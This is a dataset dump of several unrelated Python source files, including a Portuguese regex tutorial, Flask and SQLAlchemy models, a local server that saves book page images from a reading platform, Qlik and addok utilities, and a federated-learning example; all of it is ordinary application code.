comecem com 'P' ou 'p' e terminam com 'ython'\n print(re.findall(r'^[Pp]ython', frase)) # Aceita 'Python' ou 'python' se estiver no começo da string\n print(re.findall(r'[Pp]ython$', frase)) # Aceita 'Python' ou 'python' se estiver no fim da string\n\n\ndef quantificadores():\n # Quantificadores: Ditam quantas vezes tal cadeia de caracteres deve aparecer\n # * - 0 ou n\n # + - 1 ou n\n # ? - 0 ou 1\n # {} - Qualquer range desejado\n frase = 'goooooooooool gl'\n\n print(\"\\nQuantificadores\")\n print(re.findall(r'go*l', frase)) # Palavras que começam com g, terminam com l e tem 0 ou n 'o' entre 'g' e 'l'\n print(re.findall(r'go+l', frase)) # Palavras que tem 1 ou n 'o' entre 'g' e 'l'\n print(re.findall(r'go?l', frase)) # Palavras que tem 0 ou 1 'o' entre 'g' 'l'\n print(re.findall(r'go{6,12}l', frase)) # Palavras que tem de 6 a 12 'o' entre 'g' e 'l'\n\n # * e + são quantificadores gulosos, então eles vão consumindo caracteres sem parar\n # Colocando um '?' após eles, os torna não gulosos\n frase = 'Python v2? Python v3? 
Python v3.8?'\n\n print(\"\\nQuantificadores Gulosos\")\n print(re.findall(r'Python.*\\?', frase)) # Guloso\n print(re.findall(r'Python.*?\\?', frase)) # Não guloso\n\n\ndef grupos():\n # Grupos são uma estrutura formada por (), ao usar um grupo, é salvada a expressão regular dentro dele\n # Possibilita reutilização da regex para encurtar a expressão, ou até para substituir texto\n # Os grupos podem ser acessados através de sua posição na regex, usando '\\x', onde x é a posição do grupo na regex\n # O número da posição é obtido através da contagem de parênteses abertos '('\n # Para a regex não salvar o grupo, usa-se '?:' no início do grupo\n html = '<p>Paragrafo</p> <section>Python</section> <div> </div>'\n\n print(\"\\nGrupos\")\n print(html)\n print(re.sub(r'(<(.+?)>)(.+?)(</\\2>)', r'\\1Isto aqui é um elemento \\2\\4', html)) # Substituindo texto usando grupos\n\n\ndef sequencias_especiais():\n # Sequencias especiais são representados por \\ seguido da letra que representa a sequencia\n # \\w todas os caracteres (não considera barra de espaço ou quebra de linha)\n # \\d todas os dígitos\n # \\s todas os tipos espaços em branco, incluindo quebra de linha\n # \\b representa a borda inicial ou final de uma cadeia de caracteres\n # Se a letra for maiúscula significa a negação da sequencia da letra minúscula\n frase = 'A proclamação da república aconteceu no dia 15 de novembro de 1889.'\n\n print(\"\\nSequencias Especiais\")\n print(re.findall(r'\\w+', frase)) # Todas as palavras\n print(re.findall(r'\\d+', frase)) # Todos os números\n print(re.findall(r'\\w*?[Aa]\\b', frase)) # Todas as palavras terminadas em a\n\n\ndef flags():\n # Flags são usadas para validar certos caracteres ou palavras no texto passado por completo\n # re.IGNORECASE - Não difere letras maiúsculas de minúsculas\n # re.ASCII - Considera somente caracteres no padrão ASCII\n # re.MULTILINE - Considera cada linha do texto passado como um novo texto\n # re.DOTALL - Considera agora quebras de linha\n emails = '''\n Joao@gmail.com online\n Marcos@gmail.com offline\n Ana@gmail.com online\n '''\n\n print(\"\\nFlags\")\n print(re.findall(r'\\w+?@gmail.com\\s(?:ONLINE|offline)$', emails, flags=re.MULTILINE | re.IGNORECASE))\n print(re.findall(r'\\w+', emails, flags=re.ASCII))\n\n\ndef capturando_condicionalmente():\n # Capturando palavras condicionadas a outras palavras\n # Usando grupos, colocar ?= antes da palavra que atua como condição de captura para capturar\n # palavras que contém o grupo com o ?=\n # Para capturar palavras que não contém tal palavra, usa-se ?! ao invés de ?=\n emails = '''\n Joao@gmail.com online\n Marcos@gmail.com offline\n Ana@gmail.com online\n '''\n print(\"\\nCapturando palavras condicionalmente\")\n print(re.findall(r'(\\w+?@gmail.com)\\s(?=online)', emails)) # Usuários online\n print(re.findall(r'(\\w+?@gmail.com)\\s(?=offline)', emails)) # Usuários offline\n\n\ndef tutorial_basico():\n nocoes_basicas()\n meta_caracteres()\n quantificadores()\n grupos()\n sequencias_especiais()\n flags()\n capturando_condicionalmente()\n\n\n# Funções que validam campos\ndef valida_email():\n option = 1\n while option == 1:\n email = input('Validando email, digite algum: ')\n email_regex = re.compile(r'^\\w+(?:[.\\-+!&%]\\w+)*@\\w+(?:[.\\-]\\w+)+$')\n # No email, apenas alguns caracteres especiais podem existir\n match = email_regex.search(email)\n print('Válido' if match else 'Não válido')\n option = int(input('Quer tentar de novo? 
Digite 1 para mais uma vez: '))\n\n\ndef valida_ip():\n option = 1\n while option == 1:\n ip = input('Validando IP, digite algum: ')\n ip_regex = re.compile(r'^(?:(?:25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9][0-9]|[0-9])\\.){3}(?:25[0-5]|2[0-4][0-9]|'\n r'1[0-9]{2}|[1-9][0-9]|[0-9])$', flags=re.M)\n match = ip_regex.search(ip)\n print('Válido' if match else 'Não válido')\n option = int(input('Quer tentar de novo? Digite 1 para mais uma vez: '))\n\n\ndef valida_cpf():\n # Não validando CPFs sequenciais, como 000.000.000-00\n option = 1\n while option == 1:\n cpf = input('Validando cpf, digite algum (digite da forma xxx.xxx.xxx-xx): ')\n cpf_regex = re.compile(r'^(?!(\\d)\\1{2}\\.\\1{3}\\.\\1{3}-\\1{2})(\\d{3}\\.\\d{3}\\.\\d{3}-\\d{2})$', flags=re.M)\n match = cpf_regex.search(cpf)\n print('Válido' if match else 'Não válido')\n option = int(input('Quer tentar de novo? Digite 1 para mais uma vez: '))\n\n\ndef valida_senha():\n option = 1\n while option == 1:\n senha = input('Validando senhas fortes(ao menos 10 caracteres, 1 dígito e uma maiuscula), digite alguma: ')\n senha_regex = re.compile(r'^(?=.*[a-z])(?=.*[A-Z])(?=.*[0-9]).{10,}$', flags=re.M)\n match = senha_regex.search(senha)\n print('Válido' if match else 'Não válido')\n option = int(input('Quer tentar de novo, digite 1 para mais uma vez: '))\n\n\ndef valida_telefone():\n option = 1\n while option == 1:\n telefone = input('Validando telefones celulares brasileiros (padrão +55 xx 9xxxxxxxx), digite algum: ')\n telefone_regex = re.compile(r'^\\+55 \\d{2} 9\\d{8}$')\n match = telefone_regex.search(telefone)\n print('Válido' if match else 'Não válido')\n option = int(input('Quer tentar de novo? Digite 1 para mais uma vez: '))\n\n\ndef valida_notacao_cientifica():\n option = 1\n while option == 1:\n notacao = input('Validando números em notação científica, positivos ou negativos,'\n ' da forma n,n*10^n, ex: 1,2*10^3 digite algum: ')\n notacao_regex = re.compile(r'^[+-]?[1-9],\\d+?\\*10\\^[-]?\\d+?$')\n match = notacao_regex.search(notacao)\n print('Válido' if match else 'Não válido')\n option = int(input('Quer tentar de novo? 
Digite 1 para mais uma vez: '))\n\n\ndef menu_validacao():\n    num = 3\n    while num != 0:\n        num = int(input('\\nMenu de Validação de Campos\\n'\n                        'Digite 1 para validar email\\nDigite 2 para validar IP\\nDigite 3 para validar CPF\\n'\n                        'Digite 4 para validar senha\\nDigite 5 para validar telefone\\n'\n                        'Digite 6 para validar números em notação científica\\nDigite 0 para sair\\n'))\n        if num == 1:\n            valida_email()\n        elif num == 2:\n            valida_ip()\n        elif num == 3:\n            valida_cpf()\n        elif num == 4:\n            valida_senha()\n        elif num == 5:\n            valida_telefone()\n        elif num == 6:\n            valida_notacao_cientifica()\n        elif num == 0:\n            pass\n        else:\n            print('Essa opção não existe')\n\n\nif __name__ == '__main__':\n    selecao = 10\n    while selecao != 0:\n        selecao = int(input('\\nDigite 1 para ir ao tutorial básico\\nDigite 2 para ir ao menu de validação de campos\\n'\n                            'Digite 0 para sair\\n'))\n        if selecao == 1:\n            tutorial_basico()\n        elif selecao == 2:\n            menu_validacao()\n        elif selecao == 0:\n            break\n        else:\n            print('Opção inválida')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"204614722","text":"# -*- coding:utf-8 -*-\nfrom flask import g\n\nfrom database import db\nfrom utils.models import ORModel, JsonSerializable\nfrom sqlalchemy.orm import relationship, backref\n\nimport datetime, hashlib, random\n\nclass Customer(db.Model, ORModel, JsonSerializable):\n    __tablename__ = 'customers'\n\n    id = db.Column(db.Integer, primary_key=True)\n    intern_id = db.Column(db.String(50), nullable=False, unique=True)\n    created = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)\n\n    email = db.Column(db.String(250), nullable=True)\n    name = db.Column(db.String(250), nullable=False)\n    removed = db.Column(db.DateTime, nullable=True, default=None)\n\n    address = db.Column(db.String(250), nullable=True)\n    zipcode = db.Column(db.String(50), nullable=True)\n    city = db.Column(db.String(250), nullable=True)\n    country = db.Column(db.String(250), nullable=True)\n\n    company = db.Column(db.String(50), nullable=True)\n    vat = db.Column(db.String(50), nullable=True)\n\n    account_id = db.Column(db.Integer, db.ForeignKey('accounts.id'), nullable=False)\n    account = relationship('Account', backref=backref('customers'))\n\n    def __init__(self):\n        # md5 requires bytes on Python 3, so the concatenated string is encoded first\n        self.intern_id = 'cust_{0}'.format(hashlib.md5((str(datetime.datetime.utcnow()) + \"{0:04d}\".format(random.randrange(0, 9999))).encode('utf-8')).hexdigest())\n\n    def __jsonserialize__(self):\n        data = {\n            'id': self.intern_id,\n            'created': int((self.created - self.UNIX_EPOCH).total_seconds() * 1000),\n            'email': self.email,\n            'name': self.name,\n            'address': self.address,\n            'zipcode': self.zipcode,\n            'city': self.city,\n            'country': self.country,\n            'company': self.company,\n            'vat': self.vat,\n        }\n\n        for meta in self.metas:\n            data[meta.name] = meta.value\n\n        return data\n\n    def __repr__(self):\n        return self.name\n\n    @classmethod\n    def find_by_email(cls, email):\n        \"\"\"\n        Return the customer with the given email.\n        \"\"\"\n        return cls.query.filter(cls.email == email).filter(cls.account_id == g.account.id).first()\n\n    @classmethod\n    def find_by_id(cls, intern_id):\n        \"\"\"\n        Return the customer with the given intern_id.\n        \"\"\"\n        return cls.query.filter(cls.intern_id == intern_id).filter(cls.account_id == g.account.id).first()\n\n    @classmethod\n    def create(cls, customer):\n        cust = Customer()\n        cust.account = g.account\n        cust.account_id = g.account.id\n        cust.name = customer['name']\n\n        
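# --- added note with a hypothetical payload, not from the original source ---
# Any payload key that is not one of the core columns handled below is
# persisted as a CustomerMeta row, e.g.:
#   Customer.create({'name': 'ACME', 'email': 'billing@acme.test',
#                    'language': 'fr'})   # 'language' becomes a CustomerMeta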
cust.email = customer['email'] if 'email' in customer else None\n        cust.address = customer['address'] if 'address' in customer else None\n        cust.zipcode = customer['zipcode'] if 'zipcode' in customer else None\n        cust.city = customer['city'] if 'city' in customer else None\n        cust.country = customer['country'] if 'country' in customer else None\n        cust.company = customer['company'] if 'company' in customer else None\n        cust.vat = customer['vat'] if 'vat' in customer else None\n        cust.save()\n\n        for item in customer:\n            if item in ['name', 'email', 'address', 'zipcode', 'city', 'country', 'company', 'vat', 'account_id', 'account']:\n                continue\n\n            CustomerMeta.create(cust, item, customer[item])\n\n\n        return cust\n\nclass CustomerMeta(db.Model, ORModel):\n    __tablename__ = 'customer_metas'\n\n    id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.String(250), nullable=False)\n    value = db.Column(db.String(250), nullable=False)\n\n    customer_id = db.Column(db.Integer, db.ForeignKey('customers.id'), nullable=False)\n    customer = relationship('Customer', backref=backref('metas'))\n\n    @classmethod\n    def create(cls, customer, name, value):\n        if value is None:\n            return None\n\n        meta = CustomerMeta()\n        meta.name = name\n        meta.value = value\n        meta.customer_id = customer.id\n        meta.customer = customer\n        meta.save()\n\n        return meta\n","sub_path":"apps/customers/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"11964392","text":"from flask import Flask,request,make_response\nfrom selenium import webdriver\nfrom PIL import Image\nfrom io import BytesIO\nimport os\n\napp = Flask(__name__)\n\n@app.route('/save/<title>',methods=['POST'])\ndef save(title):\n    try:\n        imgData = request.stream.read() # bytes of the image just posted back, used to check for the 'loading' placeholder\n        if not os.path.exists('Download'+os.sep+title): # the download dir has no folder for this title yet (the book ID on 文泉学堂)\n            os.makedirs('Download'+os.sep+title)\n            pagesTotal[title] = int(request.args.get('ap')) # initialise the total page count of this book\n            pagesLeft[title] = list(range(1,pagesTotal[title]+1)) # initialise the list of pages still to download\n            response = make_response('') # assign a response here too, otherwise the first request hits a NameError below\n        elif title not in pagesLeft: # already downloaded\n            response = make_response('')\n        elif request.args.get('k') != 'width=100' and pagesLeft[title]: # not a low-resolution image and the book is not finished yet\n            if Image.open(BytesIO(imgData)).histogram() != emptyImgHis: # not the 'loading' placeholder image\n                page = request.args.get('page') # page number of the image just received\n                with open('Download'+os.sep+title+os.sep+page+'.png','wb') as img:\n                    img.write(imgData)\n                if int(page) in pagesLeft[title]:\n                    pagesLeft[title].pop(pagesLeft[title].index(int(page))) # drop the current page from this book's to-download list\n                if pagesLeft[title]: # the book still has pages left to download\n                    response = make_response('window.scrollTo(document.getElementsByClassName(\\'page-img-box\\')[{page}].offsetLeft,document.getElementsByClassName(\\'page-img-box\\')[{page}].offsetTop);'.format(page=pagesLeft[title][0])+ \\\n                        'window.downloaderRefreshClocks.forEach((id)=>{window.clearInterval(id)});'+ \\\n                        'window.downloaderRefreshClocks=[];') # scroll to the first undownloaded page so the 文泉学堂 reader fetches it; clear downloaderRefreshClocks since the download is running and no refresh is needed\n                elif title not in titlesDone: # the whole book has been downloaded\n                    print('-'*20+title+' Done.Downloaded '+str(pagesTotal[title])+' pages.'+'-'*20)\n                    titlesDone.append(title)\n                    response = make_response('alert(\\'Done\\')')\n            else: # 'loading' placeholder detected, schedule a countdown refresh\n                response = make_response('window.downloaderRefreshClocks.push(setTimeout(()=>{location.reload()},10000))')\n        else:\n            response = make_response('')\n        \n    except BaseException as error: # catch all exceptions\n        print('[#] Error:',end='')\n        print(error)\n        response = make_response('')\n    response.headers['Access-Control-Allow-Origin'] = '*'\n    return response\n\nif __name__ == '__main__':\n    pagesTotal = {} # total pages per book, used to check for completion\n    pagesLeft = {} # pages of each book not yet downloaded\n    titlesDone = [] # titles (book IDs on 文泉学堂) already fully downloaded\n    emptyImgHis = Image.open('empty.png').histogram() # histogram of the 'loading' placeholder, so non-book images are skipped\n    app.run(host='127.0.0.1')","sub_path":"save_img.py","file_name":"save_img.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"330681562","text":"\"\"\"\nThe purpose of this script is to get Fields for documents.\nInput is the document name. Output is the list of fields (with their source tables) used in the application.\n\"\"\"\n\nimport argparse\nfrom lib.sense_engine_api import *\nimport os\nfrom lib import write2excel\n\n\ntaglist = ['$ascii', '$text', '$key', '$hidden', '$system', '$numeric', '$integer', '$timestamp', '$date',\n           '$geoname', '$keypart', '$wgs84', '$geomultipolygon', '$geopolyline', '$geopoint']\n\n\ndef handle_fields_file(fields_json):\n    \"\"\"\n    Function to convert a Fields file in Json structure into a list of field dictionaries. This list is then written\n    to an excel file.\n\n    :param fields_json: Fields information in JSON Structure\n    :return:\n    \"\"\"\n    path_parts = os.path.normpath(fields_json).split('\\\\')\n    app_name = path_parts[-2]\n    app_stream = path_parts[-3]\n    fh = open(fields_json)\n    layout = json.load(fh)\n    field_collection = layout['qFieldList']['qItems']\n    field_list = []\n    for item in field_collection:\n        for table in item['qSrcTables']:\n            field_line = dict(\n                stream=app_stream,\n                application=app_name,\n                name=item['qName'],\n                cardinal=item['qCardinal'],\n                table=table\n            )\n            for tag in item['qTags']:\n                if tag not in taglist:\n                    msg = f\"Tag {tag} not in taglist!\"\n                    logging.warning(msg)\n            for tag in taglist:\n                if tag in item['qTags']:\n                    field_line[tag[1:]] = 'Yes'\n                else:\n                    field_line[tag[1:]] = 'No'\n            field_list.append(field_line)\n    if len(field_list) > 0:\n        fn = os.path.join(inventory_dir, f\"{app_name}_fields.xlsx\")\n        xl = write2excel.Write2Excel()\n        xl.init_sheet(\"Fields\")\n        xl.write_content(field_list)\n        xl.close_workbook(fn)\n    else:\n        logging.warning(f\"No fields in document {app_name}\")\n    return\n\n\n# Initialize Environment\nprojectname = \"qlik\"\nconfig = my_env.init_env(projectname, __file__)\n# Configure command line arguments and environment\nparser = argparse.ArgumentParser(description=\"Specify target environment\")\nparser.add_argument('-t', '--target', type=str, default='Remote', choices=['Local', 'Remote'],\n                    help='Please provide the target environment (Local, Remote).')\n# parser.add_argument('-a', '--application', type=str, default='Recouvrement',\n#                     help='Please provide an application name.')\nargs = parser.parse_args()\nlogging.info(\"Arguments: {a}\".format(a=args))\nprops = init_env(args.target)\nworkdir = props['workdir']\ninventory_dir = os.getenv('INVENTORYDIR')\n\nwith os.scandir(workdir) as stream_dir:\n    for entry in stream_dir:\n        if entry.is_dir():\n            with os.scandir(entry.path) as app_dir:\n                for app in app_dir:\n                    if app.is_dir():\n                        fields_file = os.path.join(app.path, 'fields.json')\n                        if os.path.isfile(fields_file):\n                            logging.info(f\"Handling Fields file: {fields_file}\")\n                            handle_fields_file(fields_file)\n                        else:\n                            logging.error(f\"Fields file not found: {fields_file}\")\n\nlogging.info(\"End 
Application\")\n","sub_path":"tools/fields2excel.py","file_name":"fields2excel.py","file_ext":"py","file_size_in_byte":3346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"327815032","text":"import re\n\nfrom addok import config\nfrom addok.db import DB\nfrom addok.helpers import yielder, keys\nfrom addok.helpers.index import token_frequency\nfrom ngram import NGram\nfrom unidecode import unidecode\n\nPATTERN = re.compile(r\"[\\w]+\", re.U | re.X)\n\n\nclass Token(str):\n\n def __new__(cls, value, position=0, is_last=False, raw=None):\n obj = str.__new__(cls, value)\n obj.position = position\n obj.is_last = is_last\n obj.db_key = None\n obj.raw = raw or value # Allow to keep raw on update.\n return obj\n\n def __repr__(self):\n return '<Token {}>'.format(self)\n\n def update(self, value, **kwargs):\n default = dict(position=self.position, is_last=self.is_last,\n raw=self.raw)\n default.update(kwargs)\n token = Token(value=value, **default)\n return token\n\n def search(self):\n if DB.exists(self.key):\n self.db_key = self.key\n\n @property\n def is_common(self):\n return self.frequency > config.COMMON_THRESHOLD\n\n @property\n def frequency(self):\n if not hasattr(self, '_frequency'):\n self._frequency = token_frequency(self)\n return self._frequency\n\n @property\n def key(self):\n if not hasattr(self, '_key'):\n self._key = keys.token_key(self)\n return self._key\n\n\ndef _tokenize(text):\n \"\"\"Split text into a list of tokens.\"\"\"\n return PATTERN.findall(text)\n\n\ndef tokenize(pipe):\n for text in pipe:\n for position, token in enumerate(_tokenize(text)):\n yield Token(token, position=position)\n\n\ndef _normalize(s):\n return s.update(unidecode(s.lower()))\nnormalize = yielder(_normalize)\n\n\nSYNONYMS = {}\n\n\ndef load_synonyms():\n with config.RESOURCES_ROOT.joinpath(config.SYNONYMS_PATH).open() as f:\n for line in f:\n if line.startswith('#'):\n continue\n synonyms, wanted = line.split('=>')\n wanted = wanted.strip()\n synonyms = synonyms.split(',')\n for synonym in synonyms:\n synonym = synonym.strip()\n if not synonym:\n continue\n SYNONYMS[synonym] = wanted\nload_synonyms()\n\n\ndef _synonymize(t):\n return t.update(SYNONYMS.get(t, t))\nsynonymize = yielder(_synonymize)\n\n\nletters = 'abcdefghijklmnopqrstuvwxyz'\n\n\ndef make_fuzzy(word, max=1):\n \"\"\"Naive neighborhoods algo.\"\"\"\n # inversions\n neighbors = []\n for i in range(0, len(word) - 1):\n neighbor = list(word)\n neighbor[i], neighbor[i+1] = neighbor[i+1], neighbor[i]\n neighbors.append(''.join(neighbor))\n # substitutions\n for letter in letters:\n for i in range(0, len(word)):\n neighbor = list(word)\n if letter != neighbor[i]:\n neighbor[i] = letter\n neighbors.append(''.join(neighbor))\n # insertions\n for letter in letters:\n for i in range(0, len(word) + 1):\n neighbor = list(word)\n neighbor.insert(i, letter)\n neighbors.append(''.join(neighbor))\n if len(word) > 3:\n # removal\n for i in range(0, len(word)):\n neighbor = list(word)\n del neighbor[i]\n neighbors.append(''.join(neighbor))\n return neighbors\n\n\nclass ascii(str):\n \"\"\"Just like a str, but ascii folded and cached.\"\"\"\n\n def __new__(cls, value):\n try:\n cache = value._cache\n except AttributeError:\n cache = alphanumerize(unidecode(value.lower()))\n obj = str.__new__(cls, cache)\n obj._cache = cache\n return obj\n\n\ndef compare_ngrams(left, right, N=2, pad_len=0):\n left = ascii(left)\n right = ascii(right)\n if len(left) == 1 and len(right) == 1:\n # NGram.compare returns 
0.0 for 1 letter comparison, even if letters\n # are equal.\n return 1.0 if left == right else 0.0\n return NGram.compare(left, right, N=N, pad_len=pad_len)\n\n\ndef contains(candidate, target):\n candidate = ascii(candidate)\n target = ascii(target)\n return candidate in target\n\n\ndef startswith(candidate, target):\n candidate = ascii(candidate)\n target = ascii(target)\n return target.startswith(candidate)\n\n\ndef equals(candidate, target):\n candidate = ascii(candidate)\n target = ascii(target)\n return target == candidate\n\n\ndef alphanumerize(text):\n return re.sub(' {2,}', ' ', re.sub('[^\\w]', ' ', text))\n\n\ndef compute_edge_ngrams(token, min=None):\n \"\"\"Compute edge ngram of token from min. Does not includes token itself.\"\"\"\n if min is None:\n min = config.MIN_EDGE_NGRAMS\n token = token[:config.MAX_EDGE_NGRAMS + 1]\n return [token[:i] for i in range(min, len(token))]\n","sub_path":"addok/helpers/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":4729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"470589750","text":"# Copyright 2021 Tianmian Tech. All Rights Reserved.\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n\nimport argparse\n\nfrom kernel.examples.handler.component import DataIO\nfrom kernel.examples.handler.component import Evaluation\nfrom kernel.examples.handler.component import Intersection\nfrom kernel.examples.handler.component import VertFastSecureBoost\nfrom kernel.examples.handler.handler import Handler\nfrom kernel.examples.handler.interface import Data\nfrom kernel.examples.handler.utils.tools import load_job_config, JobConfig\n\n\ndef main(config=\"../../config.yaml\", param=\"./binary_config.yaml\", namespace=\"wefe_data\"):\n # obtain config\n if isinstance(config, str):\n config = load_job_config(config)\n\n if isinstance(param, str):\n param = JobConfig.load_from_file(param)\n\n parties = config.parties\n promoter = parties.promoter[0]\n provider = parties.provider[0]\n\n backend = config.backend\n work_mode = config.work_mode\n db_type = config.db_type\n\n # data sets\n promoter_train_data = {\"name\": param['data_promoter_train'], \"namespace\": namespace}\n provider_train_data = {\"name\": param['data_provider_train'], \"namespace\": namespace}\n promoter_validate_data = {\"name\": param['data_promoter_val'], \"namespace\": namespace}\n provider_validate_data = {\"name\": param['data_provider_val'], \"namespace\": namespace}\n\n # init handler\n handler = Handler(job_id=\"job_fast-vertsbt_0002\", backend=backend, work_mode=work_mode, db_type=db_type,\n fl_type='vertical') \\\n .set_initiator(role=\"promoter\", member_id=promoter) \\\n .set_roles(promoter=promoter, provider=provider)\n\n # set data reader and data-io\n dataio_0, dataio_1 = DataIO(name=\"dataio_0\"), DataIO(name=\"dataio_1\")\n\n dataio_0.get_member_instance(role=\"promoter\", member_id=promoter).component_param(table=promoter_train_data,\n with_label=True,\n output_format=\"dense\")\n 
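# --- added note; the pattern below is taken from this script itself ---
# Each component is configured per member: the promoter side carries labels,
# the provider side does not. The handler then wires components into a DAG
# through Data(...), a minimal sketch of the calls made further below
# (output_data_type and evaluation omitted):
#   handler.add_component(dataio_0)
#   handler.add_component(intersect_0, data=Data(data=dataio_0.name))
#   handler.add_component(fast_secure_boost_0, data=Data(train_data=intersect_0.name))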
dataio_0.get_member_instance(role=\"provider\", member_id=provider).component_param(table=provider_train_data,\n with_label=False)\n dataio_1.get_member_instance(role=\"promoter\", member_id=promoter).component_param(table=promoter_validate_data,\n with_label=True,\n output_format=\"dense\")\n dataio_1.get_member_instance(role=\"provider\", member_id=provider).component_param(table=provider_validate_data,\n with_label=False)\n\n # data intersect component\n intersect_0 = Intersection(name=\"intersection_0\", intersect_method=\"dh\", sync_intersect_ids=True)\n intersect_1 = Intersection(name=\"intersection_1\", intersect_method=\"dh\", sync_intersect_ids=True)\n\n # secure boost component\n fast_secure_boost_0 = VertFastSecureBoost(name=\"vert-fast_secure_boost_0\",\n num_trees=param['tree_num'],\n task_type=param['task_type'],\n objective_param={\"objective\": param['loss_func']},\n encrypt_param={\"method\": \"iterativeAffine\"},\n tree_param={\"max_depth\": param['tree_depth']},\n validation_freqs=10,\n learning_rate=param['learning_rate'],\n work_mode=param['work_mode'],\n tree_num_per_member=param['tree_num_per_member'],\n promoter_depth=param['promoter_depth'],\n provider_depth=param['provider_depth']\n )\n\n # evaluation component\n evaluation_0 = Evaluation(name=\"evaluation_0\", eval_type=param['eval_type'])\n\n handler.add_component(dataio_0)\n # handler.add_component(dataio_1)\n handler.add_component(intersect_0, data=Data(data=dataio_0.name), output_data_type=['train'])\n # handler.add_component(intersect_1, data=Data(data=dataio_1.name),output_data_type=['evaluation'])\n handler.add_component(fast_secure_boost_0, data=Data(train_data=intersect_0.name))\n handler.add_component(evaluation_0, data=Data(data=fast_secure_boost_0.name))\n\n handler.compile()\n handler.fit()\n\n print(handler.get_metric_summary(name='evaluation_0', component_name=\"vert-fast_secure_boost_0\"))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\"FAST VERT SBT JOB\")\n parser.add_argument(\"-config\", type=str,\n help=\"config file\")\n parser.add_argument(\"-param\", type=str,\n help=\"config file for params\")\n args = parser.parse_args()\n if args.config is not None:\n main(args.config, args.param)\n else:\n main()\n","sub_path":"kernel/examples/demo/vert_fast_sbt/wefe-fast-vert-sbt.py","file_name":"wefe-fast-vert-sbt.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"414710245","text":"# manages interfacing with heroku postgres db for ListKeeper cog\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker, relationship\nfrom sqlalchemy import create_engine, ForeignKey, Column, String, func\nimport secrets\nimport json\nimport os\n\nfrom typing import Union, List, Set, Any\n\nclass DatabaseError(Exception):\n def __init__(self, message=\"Unable to complete database operation!\", object_to_debug: Any=None) -> None:\n self.message: str = message\n super().__init__(self.message)\n\n# TODO: handle possibility of db downtime\n\n# config / envvars\nDATABASE_URL: Union[str, None] = None\ntry:\n with open(\"./config.json\") as f: # when hosted from a normal filesystem\n DATABASE_URL = json.load(f)[\"DATABASE_URL\"]\nexcept: # when hosted from Heroku / envvars\n DATABASE_URL = os.environ[\"DATABASE_URL\"].replace(\"postgres\", \"postgresql\") # Heroku demands \"postgres\" instead of \"postgresql\"\n\n\ntry:\n engine = create_engine(DATABASE_URL, 
echo=False)\nexcept:\n raise DatabaseError(f\"Unable to connect to the database! Address used: {DATABASE_URL}\")\nBase = declarative_base()\nSession = sessionmaker(bind=engine, expire_on_commit=False)\n\n\nclass Collection(Base):\n __tablename__ = \"collection\"\n\n name = Column(String, nullable=False)\n description = Column(String, nullable=False)\n collection_id = Column(String, primary_key=True, nullable=False)\n items = relationship(\"Item\", back_populates=\"collection\", lazy=\"joined\", cascade=\"all, delete-orphan\")\n guild_id = Column(String, nullable=False)\n\n\nclass Item(Base):\n __tablename__ = \"item\"\n\n name = Column(String, nullable=False)\n note = Column(String, nullable=True)\n item_id = Column(String, primary_key=True, nullable=False)\n collection_id = Column(String, ForeignKey(\"collection.collection_id\"), nullable=False)\n collection = relationship(\"Collection\", lazy=\"joined\", back_populates=\"items\")\n\n\nBase.metadata.create_all(engine)\n\n\n## HELPER FUNCTIONS ##\n## Create\ndef create_collection(name: str, description: Union[str, None], collection_id: str, guild_id: str) -> Collection:\n description = \"\" if description == None else description # default argument \"\" (conditional expression)\n new_colx = Collection(name=name, description=description, collection_id=collection_id, guild_id=guild_id)\n with Session() as session:\n try:\n session.add(new_colx)\n session.commit()\n return new_colx\n except:\n raise DatabaseError(\n \"Failed to add new entry to database!\\n\" +\n \"new_colx\\n\" +\n f\"name: {name}\\n\" +\n f\"description: {description}\\n\" +\n f\"collection_id: {collection_id}\\n\" +\n f\"guild_id: {guild_id}\\n\"\n )\n\n\ndef create_item(name: str, note: Union[str, None], item_id: str, collection_id: str) -> Item:\n note = \"\" if note is None else note\n new_item: Item = Item(name=name, note=note, item_id=item_id, collection_id=collection_id)\n with Session() as session:\n try:\n session.add(new_item)\n session.commit()\n except:\n raise DatabaseError(\n \"Failed to add new entry to database!\\n\" +\n \"new_item\\n\" +\n f\"name: {name}\\n\" +\n f\"note: {note}\\n\" +\n f\"item_id: {item_id}\\n\" +\n f\"collection_id: {collection_id}\\n\"\n )\n return new_item\n\n\n## Read\ndef get_guild_collections(guild_id: str) -> List[Collection]:\n with Session() as session:\n results: List[Collection] = (\n session.query(Collection)\n .filter(Collection.guild_id==guild_id)\n .all()\n )\n \n if not results:\n raise DatabaseError(\"No results found!\")\n\n return results\n\n\ndef get_collection_by_name(name: str, guild_id: str) -> Collection:\n with Session() as session:\n result: Collection = (\n session.query(Collection)\n .filter(func.lower(Collection.name) == name.lower())\n .filter(Collection.guild_id == guild_id)\n .first()\n )\n\n if result is None:\n raise DatabaseError(f\"Collection '{name}' not found!\")\n\n return result\n\n\ndef get_items(collection_name: str, guild_id: str) -> List[Item]:\n try:\n found_colx: Union[Collection, None] = get_collection_by_name(collection_name, guild_id)\n except DatabaseError as e:\n raise 